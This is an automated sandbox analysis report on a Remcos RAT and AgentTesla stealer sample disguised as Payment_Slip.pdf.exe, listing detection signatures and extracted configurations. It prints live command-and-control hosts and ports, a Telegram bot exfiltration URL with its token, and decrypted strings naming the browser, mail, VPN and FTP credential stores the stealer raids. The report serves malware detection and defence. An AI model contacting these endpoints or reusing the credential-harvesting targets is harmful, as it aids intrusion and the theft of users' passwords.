Windows Analysis Report
Payment_Slip.pdf.exe

Overview

General Information

Sample name: Payment_Slip.pdf.exe
Analysis ID: 1639467
MD5: 90133947ec6add62c5d9b23c475f602f
SHA1: 7cf9a2a412aa3bb5f78f19ba419551faad4758f2
SHA256: a35234d3e33acbb7e53abaec38ced3a45f6df0ad5ee17ba52b49478d0418f1da
Tags: exeuser-BastianHein
Infos:

Detection

Remcos, AgentTesla
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates multiple autostart registry keys
Delayed program exit found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Avira: detection malicious, Label: TR/Spy.Gen8
Found malware configuration
Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["ratianaana701.bounceme.net:9373:1", "milala.duckdns.org:9373:1"], "Assigned name": "MARCH 15", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-TWFFFD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source: 12.0.host.exe.240000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage?chat_id=5559571239"}
Source: host.exe.4860.12.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\conserver.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\host.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe ReversingLabs: Detection: 87%
Multi AV Scanner detection for submitted file
Source: Payment_Slip.pdf.exe Virustotal: Detection: 45% Perma Link
Source: Payment_Slip.pdf.exe ReversingLabs: Detection: 50%
Yara detected Remcos RAT
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Sample uses string decryption to hide its real strings
Source: 12.0.host.exe.240000.0.unpack String decryptor: /log.tmp
Source: 12.0.host.exe.240000.0.unpack String decryptor: text/html
Source: 12.0.host.exe.240000.0.unpack String decryptor: text/html
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>[
Source: 12.0.host.exe.240000.0.unpack String decryptor: yyyy-MM-dd HH:mm:ss
Source: 12.0.host.exe.240000.0.unpack String decryptor: ]<br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: text/html
Source: 12.0.host.exe.240000.0.unpack String decryptor: application/zip
Source: 12.0.host.exe.240000.0.unpack String decryptor: Time:
Source: 12.0.host.exe.240000.0.unpack String decryptor: MM/dd/yyyy HH:mm:ss
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>User Name:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>Computer Name:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>OSFullName:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>CPU:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>RAM:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: IP Address:
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <hr>
Source: 12.0.host.exe.240000.0.unpack String decryptor: New
Source: 12.0.host.exe.240000.0.unpack String decryptor: MM/dd/yyyy HH:mm:ss
Source: 12.0.host.exe.240000.0.unpack String decryptor: IP Address:
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: https://api.ipify.org
Source: 12.0.host.exe.240000.0.unpack String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: false
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: false
Source: 12.0.host.exe.240000.0.unpack String decryptor: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/
Source: 12.0.host.exe.240000.0.unpack String decryptor: 5559571239
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack String decryptor: mykksg
Source: 12.0.host.exe.240000.0.unpack String decryptor: mykksg.exe
Source: 12.0.host.exe.240000.0.unpack String decryptor: mykksg
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: false
Source: 12.0.host.exe.240000.0.unpack String decryptor: true
Source: 12.0.host.exe.240000.0.unpack String decryptor: Type
Source: 12.0.host.exe.240000.0.unpack String decryptor: XCrOSR
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Run
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <hr>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <b>[
Source: 12.0.host.exe.240000.0.unpack String decryptor: ]</b> (
Source: 12.0.host.exe.240000.0.unpack String decryptor: )<br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: {BACK}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {ALT+TAB}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {ALT+F4}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {TAB}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {ESC}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {Win}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {CAPSLOCK}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {KEYUP}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {KEYDOWN}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {KEYLEFT}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {KEYRIGHT}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {DEL}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {END}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {HOME}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {Insert}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {NumLock}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {PageDown}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {PageUp}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {ENTER}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F1}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F2}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F3}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F4}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F5}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F6}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F7}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F8}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F9}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F10}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F11}
Source: 12.0.host.exe.240000.0.unpack String decryptor: {F12}
Source: 12.0.host.exe.240000.0.unpack String decryptor: control
Source: 12.0.host.exe.240000.0.unpack String decryptor: {CTRL}
Source: 12.0.host.exe.240000.0.unpack String decryptor: &amp;
Source: 12.0.host.exe.240000.0.unpack String decryptor: &lt;
Source: 12.0.host.exe.240000.0.unpack String decryptor: &gt;
Source: 12.0.host.exe.240000.0.unpack String decryptor: &quot;
Source: 12.0.host.exe.240000.0.unpack String decryptor: <br><hr>Copied Text: <br>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <hr>
Source: 12.0.host.exe.240000.0.unpack String decryptor: logins
Source: 12.0.host.exe.240000.0.unpack String decryptor: IE/Edge
Source: 12.0.host.exe.240000.0.unpack String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Secure Note
Source: 12.0.host.exe.240000.0.unpack String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Web Password Credential
Source: 12.0.host.exe.240000.0.unpack String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Credential Picker Protector
Source: 12.0.host.exe.240000.0.unpack String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 12.0.host.exe.240000.0.unpack String decryptor: Web Credentials
Source: 12.0.host.exe.240000.0.unpack String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Credentials
Source: 12.0.host.exe.240000.0.unpack String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Domain Certificate Credential
Source: 12.0.host.exe.240000.0.unpack String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Domain Password Credential
Source: 12.0.host.exe.240000.0.unpack String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Extended Credential
Source: 12.0.host.exe.240000.0.unpack String decryptor: 00000000-0000-0000-0000-000000000000
Source: 12.0.host.exe.240000.0.unpack String decryptor: SchemaId
Source: 12.0.host.exe.240000.0.unpack String decryptor: pResourceElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: pIdentityElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: pPackageSid
Source: 12.0.host.exe.240000.0.unpack String decryptor: pAuthenticatorElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: IE/Edge
Source: 12.0.host.exe.240000.0.unpack String decryptor: UC Browser
Source: 12.0.host.exe.240000.0.unpack String decryptor: UCBrowser\
Source: 12.0.host.exe.240000.0.unpack String decryptor: Login Data
Source: 12.0.host.exe.240000.0.unpack String decryptor: journal
Source: 12.0.host.exe.240000.0.unpack String decryptor: wow_logins
Source: 12.0.host.exe.240000.0.unpack String decryptor: Safari for Windows
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 12.0.host.exe.240000.0.unpack String decryptor: <array>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <dict>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <string>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </string>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <string>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </string>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <data>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </data>
Source: 12.0.host.exe.240000.0.unpack String decryptor: -convert xml1 -s -o "
Source: 12.0.host.exe.240000.0.unpack String decryptor: \fixed_keychain.xml"
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Microsoft\Protect\
Source: 12.0.host.exe.240000.0.unpack String decryptor: credential
Source: 12.0.host.exe.240000.0.unpack String decryptor: QQ Browser
Source: 12.0.host.exe.240000.0.unpack String decryptor: Tencent\QQBrowser\User Data
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Default\EncryptedStorage
Source: 12.0.host.exe.240000.0.unpack String decryptor: Profile
Source: 12.0.host.exe.240000.0.unpack String decryptor: \EncryptedStorage
Source: 12.0.host.exe.240000.0.unpack String decryptor: entries
Source: 12.0.host.exe.240000.0.unpack String decryptor: category
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: str3
Source: 12.0.host.exe.240000.0.unpack String decryptor: str2
Source: 12.0.host.exe.240000.0.unpack String decryptor: blob0
Source: 12.0.host.exe.240000.0.unpack String decryptor: password_value
Source: 12.0.host.exe.240000.0.unpack String decryptor: IncrediMail
Source: 12.0.host.exe.240000.0.unpack String decryptor: PopPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: SmtpPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\IncrediMail\Identities\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Accounts_New
Source: 12.0.host.exe.240000.0.unpack String decryptor: PopPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: SmtpPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: SmtpServer
Source: 12.0.host.exe.240000.0.unpack String decryptor: EmailAddress
Source: 12.0.host.exe.240000.0.unpack String decryptor: Eudora
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 12.0.host.exe.240000.0.unpack String decryptor: current
Source: 12.0.host.exe.240000.0.unpack String decryptor: Settings
Source: 12.0.host.exe.240000.0.unpack String decryptor: SavePasswordText
Source: 12.0.host.exe.240000.0.unpack String decryptor: Settings
Source: 12.0.host.exe.240000.0.unpack String decryptor: ReturnAddress
Source: 12.0.host.exe.240000.0.unpack String decryptor: Falkon Browser
Source: 12.0.host.exe.240000.0.unpack String decryptor: \falkon\profiles\
Source: 12.0.host.exe.240000.0.unpack String decryptor: profiles.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 12.0.host.exe.240000.0.unpack String decryptor: profiles.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: \browsedata.db
Source: 12.0.host.exe.240000.0.unpack String decryptor: autofill
Source: 12.0.host.exe.240000.0.unpack String decryptor: ClawsMail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Claws-mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \clawsrc
Source: 12.0.host.exe.240000.0.unpack String decryptor: \clawsrc
Source: 12.0.host.exe.240000.0.unpack String decryptor: passkey0
Source: 12.0.host.exe.240000.0.unpack String decryptor: master_passphrase_salt=(.+)
Source: 12.0.host.exe.240000.0.unpack String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \accountrc
Source: 12.0.host.exe.240000.0.unpack String decryptor: smtp_server
Source: 12.0.host.exe.240000.0.unpack String decryptor: address
Source: 12.0.host.exe.240000.0.unpack String decryptor: account
Source: 12.0.host.exe.240000.0.unpack String decryptor: \passwordstorerc
Source: 12.0.host.exe.240000.0.unpack String decryptor: {(.*),(.*)}(.*)
Source: 12.0.host.exe.240000.0.unpack String decryptor: Flock Browser
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Flock\Browser\
Source: 12.0.host.exe.240000.0.unpack String decryptor: signons3.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: DynDns
Source: 12.0.host.exe.240000.0.unpack String decryptor: ALLUSERSPROFILE
Source: 12.0.host.exe.240000.0.unpack String decryptor: Dyn\Updater\config.dyndns
Source: 12.0.host.exe.240000.0.unpack String decryptor: username=
Source: 12.0.host.exe.240000.0.unpack String decryptor: password=
Source: 12.0.host.exe.240000.0.unpack String decryptor: https://account.dyn.com/
Source: 12.0.host.exe.240000.0.unpack String decryptor: t6KzXhCh
Source: 12.0.host.exe.240000.0.unpack String decryptor: ALLUSERSPROFILE
Source: 12.0.host.exe.240000.0.unpack String decryptor: Dyn\Updater\daemon.cfg
Source: 12.0.host.exe.240000.0.unpack String decryptor: global
Source: 12.0.host.exe.240000.0.unpack String decryptor: accounts
Source: 12.0.host.exe.240000.0.unpack String decryptor: account.
Source: 12.0.host.exe.240000.0.unpack String decryptor: username
Source: 12.0.host.exe.240000.0.unpack String decryptor: account.
Source: 12.0.host.exe.240000.0.unpack String decryptor: password
Source: 12.0.host.exe.240000.0.unpack String decryptor: Psi/Psi+
Source: 12.0.host.exe.240000.0.unpack String decryptor: name
Source: 12.0.host.exe.240000.0.unpack String decryptor: password
Source: 12.0.host.exe.240000.0.unpack String decryptor: Psi/Psi+
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Psi\profiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Psi+\profiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: \accounts.xml
Source: 12.0.host.exe.240000.0.unpack String decryptor: \accounts.xml
Source: 12.0.host.exe.240000.0.unpack String decryptor: OpenVPN
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\OpenVPN-GUI\configs
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\OpenVPN-GUI\configs
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\OpenVPN-GUI\configs\
Source: 12.0.host.exe.240000.0.unpack String decryptor: username
Source: 12.0.host.exe.240000.0.unpack String decryptor: auth-data
Source: 12.0.host.exe.240000.0.unpack String decryptor: entropy
Source: 12.0.host.exe.240000.0.unpack String decryptor: USERPROFILE
Source: 12.0.host.exe.240000.0.unpack String decryptor: \OpenVPN\config\
Source: 12.0.host.exe.240000.0.unpack String decryptor: remote
Source: 12.0.host.exe.240000.0.unpack String decryptor: remote
Source: 12.0.host.exe.240000.0.unpack String decryptor: NordVPN
Source: 12.0.host.exe.240000.0.unpack String decryptor: NordVPN
Source: 12.0.host.exe.240000.0.unpack String decryptor: NordVpn.exe*
Source: 12.0.host.exe.240000.0.unpack String decryptor: user.config
Source: 12.0.host.exe.240000.0.unpack String decryptor: //setting[@name='Username']/value
Source: 12.0.host.exe.240000.0.unpack String decryptor: //setting[@name='Password']/value
Source: 12.0.host.exe.240000.0.unpack String decryptor: NordVPN
Source: 12.0.host.exe.240000.0.unpack String decryptor: Private Internet Access
Source: 12.0.host.exe.240000.0.unpack String decryptor: %ProgramW6432%
Source: 12.0.host.exe.240000.0.unpack String decryptor: Private Internet Access\data
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Private Internet Access\data
Source: 12.0.host.exe.240000.0.unpack String decryptor: \account.json
Source: 12.0.host.exe.240000.0.unpack String decryptor: .*"username":"(.*?)"
Source: 12.0.host.exe.240000.0.unpack String decryptor: .*"password":"(.*?)"
Source: 12.0.host.exe.240000.0.unpack String decryptor: Private Internet Access
Source: 12.0.host.exe.240000.0.unpack String decryptor: privateinternetaccess.com
Source: 12.0.host.exe.240000.0.unpack String decryptor: FileZilla
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FileZilla\recentservers.xml
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FileZilla\recentservers.xml
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Server>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Host>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Host>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </Host>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Port>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </Port>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <User>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <User>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </User>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Pass encoding="base64">
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Pass encoding="base64">
Source: 12.0.host.exe.240000.0.unpack String decryptor: </Pass>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <Pass>
